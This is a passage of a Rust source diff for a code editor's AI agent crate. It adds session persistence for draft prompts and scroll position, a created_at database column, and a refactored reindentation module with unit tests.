acp_thread.update(cx, |thread, _cx| { + thread.set_draft_prompt(Some(draft_blocks.clone())); + }); + thread.update(cx, |thread, _cx| { + thread.set_ui_scroll_position(Some(gpui::ListOffset { + item_ix: 5, + offset_in_item: gpui::px(12.5), + })); + }); + // Close the session so it can be reloaded from disk. cx.update(|cx| connection.clone().close_session(&session_id, cx)) .await @@ -2571,7 +2879,9 @@ mod internal_tests { )] ); let acp_thread = agent - .update(cx, |agent, cx| agent.open_thread(session_id.clone(), cx)) + .update(cx, |agent, cx| { + agent.open_thread(session_id.clone(), project.clone(), cx) + }) .await .unwrap(); acp_thread.read_with(cx, |thread, cx| { @@ -2589,6 +2899,174 @@ mod internal_tests { "} ) }); + + // Ensure the draft prompt with rich content blocks survived the round-trip. + acp_thread.read_with(cx, |thread, _| { + assert_eq!(thread.draft_prompt(), Some(draft_blocks.as_slice())); + }); + + // Ensure token usage survived the round-trip. + acp_thread.read_with(cx, |thread, _| { + let usage = thread + .token_usage() + .expect("token usage should be restored after reload"); + assert_eq!(usage.input_tokens, 150); + assert_eq!(usage.output_tokens, 75); + }); + + // Ensure scroll position survived the round-trip. + acp_thread.read_with(cx, |thread, _| { + let scroll = thread + .ui_scroll_position() + .expect("scroll position should be restored after reload"); + assert_eq!(scroll.item_ix, 5); + assert_eq!(scroll.offset_in_item, gpui::px(12.5)); + }); + } + + #[gpui::test] + async fn test_close_session_saves_thread(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/", + json!({ + "a": { + "file.txt": "hello" + } + }), + ) + .await; + let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; + let thread_store = cx.new(|cx| ThreadStore::new(cx)); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); + let connection = Rc::new(NativeAgentConnection(agent.clone())); + + let acp_thread = cx + .update(|cx| { + connection + .clone() + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) + }) + .await + .unwrap(); + let session_id = acp_thread.read_with(cx, |thread, _| thread.session_id().clone()); + let thread = agent.read_with(cx, |agent, _| { + agent.sessions.get(&session_id).unwrap().thread.clone() + }); + + let model = Arc::new(FakeLanguageModel::default()); + thread.update(cx, |thread, cx| { + thread.set_model(model.clone(), cx); + }); + + // Send a message so the thread is non-empty (empty threads aren't saved). + let send = acp_thread.update(cx, |thread, cx| thread.send(vec!["hello".into()], cx)); + let send = cx.foreground_executor().spawn(send); + cx.run_until_parked(); + + model.send_last_completion_stream_text_chunk("world"); + model.end_last_completion_stream(); + send.await.unwrap(); + cx.run_until_parked(); + + // Set a draft prompt WITHOUT calling run_until_parked afterwards. + // This means no observe-triggered save has run for this change. + // The only way this data gets persisted is if close_session + // itself performs the save. + let draft_blocks = vec![acp::ContentBlock::Text(acp::TextContent::new( + "unsaved draft", + ))]; + acp_thread.update(cx, |thread, _cx| { + thread.set_draft_prompt(Some(draft_blocks.clone())); + }); + + // Close the session immediately — no run_until_parked in between. + cx.update(|cx| connection.clone().close_session(&session_id, cx)) + .await + .unwrap(); + cx.run_until_parked(); + + // Reopen and verify the draft prompt was saved. + let reloaded = agent + .update(cx, |agent, cx| { + agent.open_thread(session_id.clone(), project.clone(), cx) + }) + .await + .unwrap(); + reloaded.read_with(cx, |thread, _| { + assert_eq!( + thread.draft_prompt(), + Some(draft_blocks.as_slice()), + "close_session must save the thread; draft prompt was lost" + ); + }); + } + + #[gpui::test] + async fn test_rapid_title_changes_do_not_loop(cx: &mut TestAppContext) { + // Regression test: rapid title changes must not cause a propagation loop + // between Thread and AcpThread via handle_thread_title_updated. + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/", json!({ "a": {} })).await; + let project = Project::test(fs.clone(), [], cx).await; + let thread_store = cx.new(|cx| ThreadStore::new(cx)); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); + let connection = Rc::new(NativeAgentConnection(agent.clone())); + + let acp_thread = cx + .update(|cx| { + connection + .clone() + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) + }) + .await + .unwrap(); + + let session_id = acp_thread.read_with(cx, |thread, _| thread.session_id().clone()); + let thread = agent.read_with(cx, |agent, _| { + agent.sessions.get(&session_id).unwrap().thread.clone() + }); + + let title_updated_count = Rc::new(std::cell::RefCell::new(0usize)); + cx.update(|cx| { + let count = title_updated_count.clone(); + cx.subscribe( + &thread, + move |_entity: Entity, _event: &TitleUpdated, _cx: &mut App| { + let new_count = { + let mut count = count.borrow_mut(); + *count += 1; + *count + }; + assert!( + new_count <= 2, + "TitleUpdated fired {new_count} times; \ + title updates are looping" + ); + }, + ) + .detach(); + }); + + thread.update(cx, |thread, cx| thread.set_title("first".into(), cx)); + thread.update(cx, |thread, cx| thread.set_title("second".into(), cx)); + + cx.run_until_parked(); + + thread.read_with(cx, |thread, _| { + assert_eq!(thread.title(), Some("second".into())); + }); + acp_thread.read_with(cx, |acp_thread, _| { + assert_eq!(acp_thread.title(), Some("second".into())); + }); + + assert_eq!(*title_updated_count.borrow(), 2); } fn thread_entries( diff --git a/crates/agent/src/db.rs b/crates/agent/src/db.rs index 5a14e920e52c18fb6341e09fa9f747b3c5019f1d..bde07a040869bf11a1b95bf433bf6af1e2d0a932 100644 --- a/crates/agent/src/db.rs +++ b/crates/agent/src/db.rs @@ -25,18 +25,31 @@ pub type DbMessage = crate::Message; pub type DbSummary = crate::legacy_thread::DetailedSummaryState; pub type DbLanguageModel = crate::legacy_thread::SerializedLanguageModel; -#[derive(Debug, Clone, Serialize, Deserialize)] +#[derive(Debug, Clone)] pub struct DbThreadMetadata { pub id: acp::SessionId, pub parent_session_id: Option, - #[serde(alias = "summary")] pub title: SharedString, pub updated_at: DateTime, + pub created_at: Option>, /// The workspace folder paths this thread was created against, sorted /// lexicographically. Used for grouping threads by project in the sidebar. pub folder_paths: PathList, } +impl From<&DbThreadMetadata> for acp_thread::AgentSessionInfo { + fn from(meta: &DbThreadMetadata) -> Self { + Self { + session_id: meta.id.clone(), + work_dirs: Some(meta.folder_paths.clone()), + title: Some(meta.title.clone()), + updated_at: Some(meta.updated_at), + created_at: meta.created_at, + meta: None, + } + } +} + #[derive(Debug, Serialize, Deserialize)] pub struct DbThread { pub title: SharedString, @@ -64,6 +77,16 @@ pub struct DbThread { pub thinking_enabled: bool, #[serde(default)] pub thinking_effort: Option, + #[serde(default)] + pub draft_prompt: Option>, + #[serde(default)] + pub ui_scroll_position: Option, +} + +#[derive(Debug, Clone, Copy, PartialEq, Serialize, Deserialize)] +pub struct SerializedScrollPosition { + pub item_ix: usize, + pub offset_in_item: f32, } #[derive(Debug, Clone, Serialize, Deserialize)] @@ -105,6 +128,8 @@ impl SharedThread { speed: None, thinking_enabled: false, thinking_effort: None, + draft_prompt: None, + ui_scroll_position: None, } } @@ -282,6 +307,8 @@ impl DbThread { speed: None, thinking_enabled: false, thinking_effort: None, + draft_prompt: None, + ui_scroll_position: None, }) } } @@ -394,6 +421,17 @@ impl ThreadsDatabase { s().ok(); } + if let Ok(mut s) = connection.exec(indoc! {" + ALTER TABLE threads ADD COLUMN created_at TEXT; + "}) + { + if s().is_ok() { + connection.exec(indoc! {" + UPDATE threads SET created_at = updated_at WHERE created_at IS NULL + "})?()?; + } + } + let db = Self { executor, connection: Arc::new(Mutex::new(connection)), @@ -444,8 +482,22 @@ impl ThreadsDatabase { let data_type = DataType::Zstd; let data = compressed; - let mut insert = connection.exec_bound::<(Arc, Option>, Option, Option, String, String, DataType, Vec)>(indoc! {" - INSERT OR REPLACE INTO threads (id, parent_id, folder_paths, folder_paths_order, summary, updated_at, data_type, data) VALUES (?, ?, ?, ?, ?, ?, ?, ?) + // Use the thread's updated_at as created_at for new threads. + // This ensures the creation time reflects when the thread was conceptually + // created, not when it was saved to the database. + let created_at = updated_at.clone(); + + let mut insert = connection.exec_bound::<(Arc, Option>, Option, Option, String, String, DataType, Vec, String)>(indoc! {" + INSERT INTO threads (id, parent_id, folder_paths, folder_paths_order, summary, updated_at, data_type, data, created_at) + VALUES (?1, ?2, ?3, ?4, ?5, ?6, ?7, ?8, ?9) + ON CONFLICT(id) DO UPDATE SET + parent_id = excluded.parent_id, + folder_paths = excluded.folder_paths, + folder_paths_order = excluded.folder_paths_order, + summary = excluded.summary, + updated_at = excluded.updated_at, + data_type = excluded.data_type, + data = excluded.data "})?; insert(( @@ -457,6 +509,7 @@ impl ThreadsDatabase { updated_at, data_type, data, + created_at, ))?; Ok(()) @@ -469,14 +522,14 @@ impl ThreadsDatabase { let connection = connection.lock(); let mut select = connection - .select_bound::<(), (Arc, Option>, Option, Option, String, String)>(indoc! {" - SELECT id, parent_id, folder_paths, folder_paths_order, summary, updated_at FROM threads ORDER BY updated_at DESC + .select_bound::<(), (Arc, Option>, Option, Option, String, String, Option)>(indoc! {" + SELECT id, parent_id, folder_paths, folder_paths_order, summary, updated_at, created_at FROM threads ORDER BY updated_at DESC, created_at DESC "})?; let rows = select(())?; let mut threads = Vec::new(); - for (id, parent_id, folder_paths, folder_paths_order, summary, updated_at) in rows { + for (id, parent_id, folder_paths, folder_paths_order, summary, updated_at, created_at) in rows { let folder_paths = folder_paths .map(|paths| { PathList::deserialize(&util::path_list::SerializedPathList { @@ -485,11 +538,18 @@ impl ThreadsDatabase { }) }) .unwrap_or_default(); + let created_at = created_at + .as_deref() + .map(DateTime::parse_from_rfc3339) + .transpose()? + .map(|dt| dt.with_timezone(&Utc)); + threads.push(DbThreadMetadata { id: acp::SessionId::new(id), parent_session_id: parent_id.map(acp::SessionId::new), title: summary.into(), updated_at: DateTime::parse_from_rfc3339(&updated_at)?.with_timezone(&Utc), + created_at, folder_paths, }); } @@ -632,11 +692,13 @@ mod tests { speed: None, thinking_enabled: false, thinking_effort: None, + draft_prompt: None, + ui_scroll_position: None, } } #[gpui::test] - async fn test_list_threads_orders_by_updated_at(cx: &mut TestAppContext) { + async fn test_list_threads_orders_by_created_at(cx: &mut TestAppContext) { let database = ThreadsDatabase::new(cx.executor()).unwrap(); let older_id = session_id("thread-a"); @@ -697,6 +759,10 @@ mod tests { entries[0].updated_at, Utc.with_ymd_and_hms(2024, 1, 2, 0, 0, 0).unwrap() ); + assert!( + entries[0].created_at.is_some(), + "created_at should be populated" + ); } #[test] @@ -715,6 +781,22 @@ mod tests { ); } + #[test] + fn test_draft_prompt_defaults_to_none() { + let json = r#"{ + "title": "Old Thread", + "messages": [], + "updated_at": "2024-01-01T00:00:00Z" + }"#; + + let db_thread: DbThread = serde_json::from_str(json).expect("Failed to deserialize"); + + assert!( + db_thread.draft_prompt.is_none(), + "Legacy threads without draft_prompt field should default to None" + ); + } + #[gpui::test] async fn test_subagent_context_roundtrips_through_save_load(cx: &mut TestAppContext) { let database = ThreadsDatabase::new(cx.executor()).unwrap(); @@ -798,7 +880,6 @@ mod tests { let threads = database.list_threads().await.unwrap(); assert_eq!(threads.len(), 1); - assert_eq!(threads[0].folder_paths, folder_paths); } #[gpui::test] @@ -818,6 +899,54 @@ mod tests { let threads = database.list_threads().await.unwrap(); assert_eq!(threads.len(), 1); - assert!(threads[0].folder_paths.is_empty()); + } + + #[test] + fn test_scroll_position_defaults_to_none() { + let json = r#"{ + "title": "Old Thread", + "messages": [], + "updated_at": "2024-01-01T00:00:00Z" + }"#; + + let db_thread: DbThread = serde_json::from_str(json).expect("Failed to deserialize"); + + assert!( + db_thread.ui_scroll_position.is_none(), + "Legacy threads without scroll_position field should default to None" + ); + } + + #[gpui::test] + async fn test_scroll_position_roundtrips_through_save_load(cx: &mut TestAppContext) { + let database = ThreadsDatabase::new(cx.executor()).unwrap(); + + let thread_id = session_id("thread-with-scroll"); + + let mut thread = make_thread( + "Thread With Scroll", + Utc.with_ymd_and_hms(2024, 1, 1, 0, 0, 0).unwrap(), + ); + thread.ui_scroll_position = Some(SerializedScrollPosition { + item_ix: 42, + offset_in_item: 13.5, + }); + + database + .save_thread(thread_id.clone(), thread, PathList::default()) + .await + .unwrap(); + + let loaded = database + .load_thread(thread_id) + .await + .unwrap() + .expect("thread should exist"); + + let scroll = loaded + .ui_scroll_position + .expect("scroll_position should be restored"); + assert_eq!(scroll.item_ix, 42); + assert!((scroll.offset_in_item - 13.5).abs() < f32::EPSILON); } } diff --git a/crates/agent/src/edit_agent.rs b/crates/agent/src/edit_agent.rs index 288a3178f3c4501ae9de65d19624b66cbda2548d..afaa124de066d92e5a1d1a1670f762017f086d01 100644 --- a/crates/agent/src/edit_agent.rs +++ b/crates/agent/src/edit_agent.rs @@ -1,13 +1,13 @@ mod create_file_parser; mod edit_parser; -#[cfg(test)] +#[cfg(all(test, feature = "unit-eval"))] mod evals; +pub mod reindent; pub mod streaming_fuzzy_matcher; use crate::{Template, Templates}; use action_log::ActionLog; use anyhow::Result; -use cloud_llm_client::CompletionIntent; use create_file_parser::{CreateFileParser, CreateFileParserEvent}; pub use edit_parser::EditFormat; use edit_parser::{EditParser, EditParserEvent, EditParserMetrics}; @@ -20,13 +20,14 @@ use futures::{ use gpui::{AppContext, AsyncApp, Entity, Task}; use language::{Anchor, Buffer, BufferSnapshot, LineIndent, Point, TextBufferSnapshot}; use language_model::{ - LanguageModel, LanguageModelCompletionError, LanguageModelRequest, LanguageModelRequestMessage, - LanguageModelToolChoice, MessageContent, Role, + CompletionIntent, LanguageModel, LanguageModelCompletionError, LanguageModelRequest, + LanguageModelRequestMessage, LanguageModelToolChoice, MessageContent, Role, }; use project::{AgentLocation, Project}; +use reindent::{IndentDelta, Reindenter}; use schemars::JsonSchema; use serde::{Deserialize, Serialize}; -use std::{cmp, iter, mem, ops::Range, pin::Pin, sync::Arc, task::Poll}; +use std::{mem, ops::Range, pin::Pin, sync::Arc, task::Poll}; use streaming_diff::{CharOperation, StreamingDiff}; use streaming_fuzzy_matcher::StreamingFuzzyMatcher; @@ -82,6 +83,7 @@ pub struct EditAgent { templates: Arc, edit_format: EditFormat, thinking_allowed: bool, + update_agent_location: bool, } impl EditAgent { @@ -92,6 +94,7 @@ impl EditAgent { templates: Arc, edit_format: EditFormat, allow_thinking: bool, + update_agent_location: bool, ) -> Self { EditAgent { model, @@ -100,6 +103,7 @@ impl EditAgent { templates, edit_format, thinking_allowed: allow_thinking, + update_agent_location, } } @@ -168,15 +172,17 @@ impl EditAgent { ) -> Result<()> { let buffer_id = cx.update(|cx| { let buffer_id = buffer.read(cx).remote_id(); - self.project.update(cx, |project, cx| { - project.set_agent_location( - Some(AgentLocation { - buffer: buffer.downgrade(), - position: language::Anchor::min_for_buffer(buffer_id), - }), - cx, - ) - }); + if self.update_agent_location { + self.project.update(cx, |project, cx| { + project.set_agent_location( + Some(AgentLocation { + buffer: buffer.downgrade(), + position: language::Anchor::min_for_buffer(buffer_id), + }), + cx, + ) + }); + } buffer_id }); @@ -188,15 +194,17 @@ impl EditAgent { .ok() }; let set_agent_location = |cx: &mut _| { - self.project.update(cx, |project, cx| { - project.set_agent_location( - Some(AgentLocation { - buffer: buffer.downgrade(), - position: language::Anchor::max_for_buffer(buffer_id), - }), - cx, - ) - }) + if self.update_agent_location { + self.project.update(cx, |project, cx| { + project.set_agent_location( + Some(AgentLocation { + buffer: buffer.downgrade(), + position: language::Anchor::max_for_buffer(buffer_id), + }), + cx, + ) + }) + } }; let mut first_chunk = true; while let Some(event) = parse_rx.next().await { @@ -300,15 +308,17 @@ impl EditAgent { if let Some(old_range) = old_range { let old_range = snapshot.anchor_before(old_range.start) ..snapshot.anchor_before(old_range.end); - self.project.update(cx, |project, cx| { - project.set_agent_location( - Some(AgentLocation { - buffer: buffer.downgrade(), - position: old_range.end, - }), - cx, - ); - }); + if self.update_agent_location { + self.project.update(cx, |project, cx| { + project.set_agent_location( + Some(AgentLocation { + buffer: buffer.downgrade(), + position: old_range.end, + }), + cx, + ); + }); + } output_events .unbounded_send(EditAgentOutputEvent::ResolvingEditRange(old_range)) .ok(); @@ -364,13 +374,13 @@ impl EditAgent { buffer.edit(edits.iter().cloned(), None, cx); let max_edit_end = buffer .summaries_for_anchors::( - edits.iter().map(|(range, _)| &range.end), + edits.iter().map(|(range, _)| range.end), ) .max() .unwrap(); let min_edit_start = buffer .summaries_for_anchors::( - edits.iter().map(|(range, _)| &range.start), + edits.iter().map(|(range, _)| range.start), ) .min() .unwrap(); @@ -381,15 +391,17 @@ impl EditAgent { }); self.action_log .update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); - self.project.update(cx, |project, cx| { - project.set_agent_location( - Some(AgentLocation { - buffer: buffer.downgrade(), - position: max_edit_end, - }), - cx, - ); - }); + if self.update_agent_location { + self.project.update(cx, |project, cx| { + project.set_agent_location( + Some(AgentLocation { + buffer: buffer.downgrade(), + position: max_edit_end, + }), + cx, + ); + }); + } (min_edit_start, max_edit_end) }); output_events @@ -553,15 +565,8 @@ impl EditAgent { let compute_edits = cx.background_spawn(async move { let buffer_start_indent = snapshot .line_indent_for_row(snapshot.offset_to_point(resolved_old_text.range.start).row); - let indent_delta = if buffer_start_indent.tabs > 0 { - IndentDelta::Tabs( - buffer_start_indent.tabs as isize - resolved_old_text.indent.tabs as isize, - ) - } else { - IndentDelta::Spaces( - buffer_start_indent.spaces as isize - resolved_old_text.indent.spaces as isize, - ) - }; + let indent_delta = + reindent::compute_indent_delta(buffer_start_indent, resolved_old_text.indent); let old_text = snapshot .text_for_range(resolved_old_text.range.clone()) @@ -608,8 +613,7 @@ impl EditAgent { delta: IndentDelta, mut stream: impl Unpin + Stream>, ) -> impl Stream> { - let mut buffer = String::new(); - let mut in_leading_whitespace = true; + let mut reindenter = Reindenter::new(delta); let mut done = false; futures::stream::poll_fn(move |cx| { while !done { @@ -622,55 +626,10 @@ impl EditAgent { _ => return Poll::Ready(None), }; - buffer.push_str(&chunk); - - let mut indented_new_text = String::new(); - let mut start_ix = 0; - let mut newlines = buffer.match_indices('\n').peekable(); - loop { - let (line_end, is_pending_line) = match newlines.next() { - Some((ix, _)) => (ix, false), - None => (buffer.len(), true), - }; - let line = &buffer[start_ix..line_end]; - - if in_leading_whitespace { - if let Some(non_whitespace_ix) = line.find(|c| delta.character() != c) { - // We found a non-whitespace character, adjust - // indentation based on the delta. - let new_indent_len = - cmp::max(0, non_whitespace_ix as isize + delta.len()) as usize; - indented_new_text - .extend(iter::repeat(delta.character()).take(new_indent_len)); - indented_new_text.push_str(&line[non_whitespace_ix..]); - in_leading_whitespace = false; - } else if is_pending_line { - // We're still in leading whitespace and this line is incomplete. - // Stop processing until we receive more input. - break; - } else { - // This line is entirely whitespace. Push it without indentation. - indented_new_text.push_str(line); - } - } else { - indented_new_text.push_str(line); - } - - if is_pending_line { - start_ix = line_end; - break; - } else { - in_leading_whitespace = true; - indented_new_text.push('\n'); - start_ix = line_end + 1; - } - } - buffer.replace_range(..start_ix, ""); - + let mut indented_new_text = reindenter.push(&chunk); // This was the last chunk, push all the buffered content as-is. if is_last_chunk { - indented_new_text.push_str(&buffer); - buffer.clear(); + indented_new_text.push_str(&reindenter.finish()); done = true; } @@ -761,28 +720,6 @@ struct ResolvedOldText { indent: LineIndent, } -#[derive(Copy, Clone, Debug)] -enum IndentDelta { - Spaces(isize), - Tabs(isize), -} - -impl IndentDelta { - fn character(&self) -> char { - match self { - IndentDelta::Spaces(_) => ' ', - IndentDelta::Tabs(_) => '\t', - } - } - - fn len(&self) -> isize { - match self { - IndentDelta::Spaces(n) => *n, - IndentDelta::Tabs(n) => *n, - } - } -} - #[cfg(test)] mod tests { use super::*; @@ -1463,6 +1400,7 @@ mod tests { Templates::new(), EditFormat::XmlTags, thinking_allowed, + true, ) } @@ -1581,7 +1519,7 @@ mod tests { stream: &mut UnboundedReceiver, ) -> Vec { let mut events = Vec::new(); - while let Ok(Some(event)) = stream.try_next() { + while let Ok(event) = stream.try_recv() { events.push(event); } events diff --git a/crates/agent/src/edit_agent/evals.rs b/crates/agent/src/edit_agent/evals.rs index cdf6c1c0b3f6440e4827c8b74b47a32d997b092f..ba8b7ed867ea26bcdcdee7f8bf20390c2f9592b3 100644 --- a/crates/agent/src/edit_agent/evals.rs +++ b/crates/agent/src/edit_agent/evals.rs @@ -4,7 +4,7 @@ use crate::{ ListDirectoryTool, ListDirectoryToolInput, ReadFileTool, ReadFileToolInput, }; use Role::*; -use client::{Client, UserStore}; +use client::{Client, RefreshLlmTokenListener, UserStore}; use eval_utils::{EvalOutput, EvalOutputProcessor, OutcomeKind}; use fs::FakeFs; use futures::{FutureExt, future::LocalBoxFuture}; @@ -1423,7 +1423,8 @@ impl EditAgentTest { let client = Client::production(cx); let user_store = cx.new(|cx| UserStore::new(client.clone(), cx)); settings::init(cx); - language_model::init(client.clone(), cx); + language_model::init(cx); + RefreshLlmTokenListener::register(client.clone(), user_store.clone(), cx); language_models::init(user_store, client.clone(), cx); }); @@ -1469,6 +1470,7 @@ impl EditAgentTest { Templates::new(), edit_format, true, + true, ), project, judge_model, diff --git a/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/before.rs b/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/before.rs index 607daa8ce3a129e0f4bc53a00d1a62f479da3932..198ab45b13faef814e5964892e02e4c9d60de5b0 100644 --- a/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/before.rs +++ b/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/before.rs @@ -550,7 +550,7 @@ impl Default for EditorStyle { } pub fn make_inlay_hints_style(cx: &mut App) -> HighlightStyle { - let show_background = language_settings::language_settings(None, None, cx) + let show_background = language_settings::language_settings(cx).get() .inlay_hints .show_background; @@ -5989,7 +5989,7 @@ impl Editor { let file = buffer.file(); - if !language_settings(buffer.language().map(|l| l.name()), file, cx).show_edit_predictions { + if !language_settings(cx).buffer(buffer).get().show_edit_predictions { return EditPredictionSettings::Disabled; }; @@ -7837,7 +7837,7 @@ impl Editor { h_flex() .px_0p5() .when(is_platform_style_mac, |parent| parent.gap_0p5()) - .font(theme::ThemeSettings::get_global(cx).buffer_font.clone()) + .font(theme_settings::ThemeSettings::get_global(cx).buffer_font.clone()) .text_size(TextSize::XSmall.rems(cx)) .child(h_flex().children(ui::render_modifiers( &accept_keystroke.modifiers, @@ -8149,7 +8149,7 @@ impl Editor { .px_2() .child( h_flex() - .font(theme::ThemeSettings::get_global(cx).buffer_font.clone()) + .font(theme_settings::ThemeSettings::get_global(cx).buffer_font.clone()) .when(is_platform_style_mac, |parent| parent.gap_1()) .child(h_flex().children(ui::render_modifiers( &accept_keystroke.modifiers, @@ -8258,7 +8258,7 @@ impl Editor { .gap_2() .pr_1() .overflow_x_hidden() - .font(theme::ThemeSettings::get_global(cx).buffer_font.clone()) + .font(theme_settings::ThemeSettings::get_global(cx).buffer_font.clone()) .child(left) .child(preview), ) @@ -11922,6 +11922,7 @@ impl Editor { scroll_anchor: scroll_state, scroll_top_row, }), + Some(cursor_position.row), cx, ); cx.emit(EditorEvent::PushedToNavHistory { @@ -18800,7 +18801,7 @@ fn choose_completion_range( } = &completion.source { let completion_mode_setting = - language_settings(buffer.language().map(|l| l.name()), buffer.file(), cx) + language_settings(cx).buffer(buffer).get() .completions .lsp_insert_mode; @@ -19849,7 +19850,7 @@ fn inlay_hint_settings( ) -> InlayHintSettings { let file = snapshot.file_at(location); let language = snapshot.language_at(location).map(|l| l.name()); - language_settings(language, file, cx).inlay_hints + language_settings(cx).language(language).file(file).get().inlay_hints } fn consume_contiguous_rows( diff --git a/crates/agent/src/edit_agent/reindent.rs b/crates/agent/src/edit_agent/reindent.rs new file mode 100644 index 0000000000000000000000000000000000000000..7f08749e475f6acfcf63013abd9139574112e4b5 --- /dev/null +++ b/crates/agent/src/edit_agent/reindent.rs @@ -0,0 +1,214 @@ +use language::LineIndent; +use std::{cmp, iter}; + +#[derive(Copy, Clone, Debug)] +pub enum IndentDelta { + Spaces(isize), + Tabs(isize), +} + +impl IndentDelta { + pub fn character(&self) -> char { + match self { + IndentDelta::Spaces(_) => ' ', + IndentDelta::Tabs(_) => '\t', + } + } + + pub fn len(&self) -> isize { + match self { + IndentDelta::Spaces(n) => *n, + IndentDelta::Tabs(n) => *n, + } + } +} + +pub fn compute_indent_delta(buffer_indent: LineIndent, query_indent: LineIndent) -> IndentDelta { + if buffer_indent.tabs > 0 { + IndentDelta::Tabs(buffer_indent.tabs as isize - query_indent.tabs as isize) + } else { + IndentDelta::Spaces(buffer_indent.spaces as isize - query_indent.spaces as isize) + } +} + +/// Synchronous re-indentation adapter. Buffers incomplete lines and applies +/// an `IndentDelta` to each line's leading whitespace before emitting it. +pub struct Reindenter { + delta: IndentDelta, + buffer: String, + in_leading_whitespace: bool, +} + +impl Reindenter { + pub fn new(delta: IndentDelta) -> Self { + Self { + delta, + buffer: String::new(), + in_leading_whitespace: true, + } + } + + /// Feed a chunk of text and return the re-indented portion that is + /// ready to emit. Incomplete trailing lines are buffered internally. + pub fn push(&mut self, chunk: &str) -> String { + self.buffer.push_str(chunk); + self.drain(false) + } + + /// Flush any remaining buffered content (call when the stream is done). + pub fn finish(&mut self) -> String { + self.drain(true) + } + + fn drain(&mut self, is_final: bool) -> String { + let mut indented = String::new(); + let mut start_ix = 0; + let mut newlines = self.buffer.match_indices('\n'); + loop { + let (line_end, is_pending_line) = match newlines.next() { + Some((ix, _)) => (ix, false), + None => (self.buffer.len(), true), + }; + let line = &self.buffer[start_ix..line_end]; + + if self.in_leading_whitespace { + if let Some(non_whitespace_ix) = line.find(|c| self.delta.character() != c) { + // We found a non-whitespace character, adjust indentation + // based on the delta. + let new_indent_len = + cmp::max(0, non_whitespace_ix as isize + self.delta.len()) as usize; + indented.extend(iter::repeat(self.delta.character()).take(new_indent_len)); + indented.push_str(&line[non_whitespace_ix..]); + self.in_leading_whitespace = false; + } else if is_pending_line && !is_final { + // We're still in leading whitespace and this line is incomplete. + // Stop processing until we receive more input. + break; + } else { + // This line is entirely whitespace. Push it without indentation. + indented.push_str(line); + } + } else { + indented.push_str(line); + } + + if is_pending_line { + start_ix = line_end; + break; + } else { + self.in_leading_whitespace = true; + indented.push('\n'); + start_ix = line_end + 1; + } + } + self.buffer.replace_range(..start_ix, ""); + if is_final { + indented.push_str(&self.buffer); + self.buffer.clear(); + } + indented + } +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_indent_single_chunk() { + let mut r = Reindenter::new(IndentDelta::Spaces(2)); + let out = r.push(" abc\n def\n ghi"); + // All three lines are emitted: "ghi" starts with spaces but + // contains non-whitespace, so it's processed immediately. + assert_eq!(out, " abc\n def\n ghi"); + let out = r.finish(); + assert_eq!(out, ""); + } + + #[test] + fn test_outdent_tabs() { + let mut r = Reindenter::new(IndentDelta::Tabs(-2)); + let out = r.push("\t\t\t\tabc\n\t\tdef\n\t\t\t\t\t\tghi"); + assert_eq!(out, "\t\tabc\ndef\n\t\t\t\tghi"); + let out = r.finish(); + assert_eq!(out, ""); + } + + #[test] + fn test_incremental_chunks() { + let mut r = Reindenter::new(IndentDelta::Spaces(2)); + // Feed " ab" — the `a` is non-whitespace, so the line is + // processed immediately even without a trailing newline. + let out = r.push(" ab"); + assert_eq!(out, " ab"); + // Feed "c\n" — appended to the already-processed line (no longer + // in leading whitespace). + let out = r.push("c\n"); + assert_eq!(out, "c\n"); + let out = r.finish(); + assert_eq!(out, ""); + } + + #[test] + fn test_zero_delta() { + let mut r = Reindenter::new(IndentDelta::Spaces(0)); + let out = r.push(" hello\n world\n"); + assert_eq!(out, " hello\n world\n"); + let out = r.finish(); + assert_eq!(out, ""); + } + + #[test] + fn test_clamp_negative_indent() { + let mut r = Reindenter::new(IndentDelta::Spaces(-10)); + let out = r.push(" abc\n"); + // max(0, 2 - 10) = 0, so no leading spaces. + assert_eq!(out, "abc\n"); + let out = r.finish(); + assert_eq!(out, ""); + } + + #[test] + fn test_whitespace_only_lines() { + let mut r = Reindenter::new(IndentDelta::Spaces(2)); + let out = r.push(" \n code\n"); + // First line is all whitespace — emitted verbatim. Second line is indented. + assert_eq!(out, " \n code\n"); + let out = r.finish(); + assert_eq!(out, ""); + } + + #[test] + fn test_compute_indent_delta_spaces() { + let buffer = LineIndent { + tabs: 0, + spaces: 8, + line_blank: false, + }; + let query = LineIndent { + tabs: 0, + spaces: 4, + line_blank: false, + }; + let delta = compute_indent_delta(buffer, query); + assert_eq!(delta.len(), 4); + assert_eq!(delta.character(), ' '); + } + + #[test] + fn test_compute_indent_delta_tabs() { + let buffer = LineIndent { + tabs: 2, + spaces: 0, + line_blank: false, + }; + let query = LineIndent { + tabs: 3, + spaces: 0, + line_blank: false, + }; + let delta = compute_indent_delta(buffer, query); + assert_eq!(delta.len(), -1); + assert_eq!(delta.character(), '\t'); + } +} diff --git a/crates/agent/src/edit_agent/streaming_fuzzy_matcher.rs b/crates/agent/src/edit_agent/streaming_fuzzy_matcher.rs index 1ce2ca6f361a7e8186711d35d4dc640b8f13ce5a..e6a56099a293215050fa082a0432f216754473af 100644 --- a/crates/agent/src/edit_agent/streaming_fuzzy_matcher.rs +++ b/crates/agent/src/edit_agent/streaming_fuzzy_matcher.rs @@ -72,6 +72,18 @@ impl StreamingFuzzyMatcher { pub fn finish(&mut self) -> Vec> { // Process any remaining incomplete line if !self.incomplete_line.is_empty() { + if self.matches.len() == 1 { + let range = &mut self.matches[0]; + if range.end < self.snapshot.len() + && self + .snapshot + .contains_str_at(range.end + 1, &self.incomplete_line) + { + range.end += 1 + self.incomplete_line.len(); + return self.matches.clone(); + } + } + self.query_lines.push(self.incomplete_line.clone()); self.incomplete_line.clear(); self.matches = self.resolve_location_fuzzy(); @@ -722,6 +734,54 @@ mod tests { ); } + #[gpui::test] + fn 